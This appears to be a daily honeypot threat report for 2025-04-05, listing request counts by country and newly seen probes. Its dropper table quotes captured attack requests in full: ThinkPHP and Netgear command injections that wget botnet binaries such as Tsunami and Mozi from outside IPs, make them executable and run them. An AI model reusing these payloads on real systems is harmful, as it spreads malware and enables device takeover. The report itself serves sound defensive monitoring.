Daily Report: 2025-04-05#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 17 stage 1 IP address(es), linked to 7 dropper URL(s).
There are 23 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2988 requests were recorded during the day, originating from 17 different countries, with a peak of 1048 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
SC | Germany |
US | Dubai |
SE | Israel |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
139.5.0.55 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
204.76.203.18 | GET /wget HTTP/1.1 |
92.52.235.131 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
175.183.33.202 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
123.241.105.30 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
61.10.103.203 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
211.143.108.124 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
114.76.203.37 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
217.160.89.196 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
82.163.187.247 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
110.175.39.203 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
90.198.129.58 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
61.61.62.201 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
51.190.15.243 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
121.22.35.6 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
119.74.42.105 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
114 | 4 | GET /manifest.json HTTP/1.1 |
189 | 3 | GET /x0ox0ox0oxDefault/z0r0.arc HTTP/1.1 |
191 | 3 | GET /x0ox0ox0oxDefault/z0r0.sh4 HTTP/1.1 |
194 | 3 | GET /x0ox0ox0oxDefault/z0r0.mips HTTP/1.1 |
195 | 3 | GET /x0ox0ox0oxDefault/z0r0.m68k HTTP/1.1 |
198 | 3 | GET /x0ox0ox0oxDefault/z0r0.x86 HTTP/1.1 |
207 | 3 | GET /x0ox0ox0oxDefault/z0r0.arm5 HTTP/1.1 |
317 | 3 | GET /x0ox0ox0oxDefault/z0r0.arm6 HTTP/1.1 |
318 | 3 | GET /x0ox0ox0oxDefault/z0r0.mpsl HTTP/1.1 |
588 | 2 | GET /x0ox0ox0oxDefault/z0r0.ppc HTTP/1.1 |
589 | 2 | GET /x0ox0ox0oxDefault/z0r0.arm7 HTTP/1.1 |
590 | 2 | GET /x0ox0ox0oxDefault/z0r0.arm HTTP/1.1 |
593 | 2 | GET /mailman/listinfo/mailman HTTP/1.1 |
619 | 1 | GET http://www.chinaso.com/?0.10760317674236344196592736 HTTP/1.1 |
650 | 1 | GET http://www.blackle.com/?0.4020326830433873311558716 HTTP/1.1 |
687 | 1 | GET /Nmap/folder/check1743864234 HTTP/1.1 |
691 | 1 | GET /NmapUpperCheck1743864234 HTTP/1.1 |
699 | 1 | GET /i8Xc HTTP/1.1 |
703 | 1 | GET /nmaplowercheck1743864234 HTTP/1.1 |
743 | 1 | GET /lh8P HTTP/1.1 |
757 | 1 | \x00\x0E8\xA0\xC9o\xFF9d\x9A\xAD\x00\x00\x00\x00\x00 |
758 | 1 | \x00\x0E\x08\xA0\xC9o\xFF9d\x9A\xAD\x00\x00\x00\x00\x00 |
1001 | 1 | GET /users/users/users/users/users/users/users/users/users/login HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1048 | NL |
1 | 353 | GB |
2 | 265 | IL |
3 | 233 | US |
4 | 184 | SC |
5 | 162 | CN |
6 | 118 | BG |
7 | 101 | DE |
8 | 98 | SE |
9 | 72 | HK |
10 | 70 | PL |
11 | 47 | AZ |
12 | 32 | UA |
13 | 25 | FR |
14 | 23 | RU |
15 | 18 | NO |
16 | 15 | LV |
17 | 12 | KR |
18 | 10 | IE |
19 | 9 | ZA |
20 | 8 | CA |
21 | 8 | NG |
22 | 7 | TW |
23 | 7 | JP |
24 | 6 | CH |
25 | 5 | BE |
26 | 5 | ID |
27 | 5 | LT |
28 | 5 | TR |
29 | 5 | AT |
30 | 4 | MA |
31 | 4 | VN |
32 | 3 | AU |
33 | 3 | IN |
34 | 3 | IT |
35 | 3 | MC |
36 | 3 | SG |
37 | 2 | BR |
38 | 2 | HU |
39 | 1 | GH |
40 | 1 | RO |
41 | 1 | MY |
42 | 1 | TH |
43 | 1 | PK |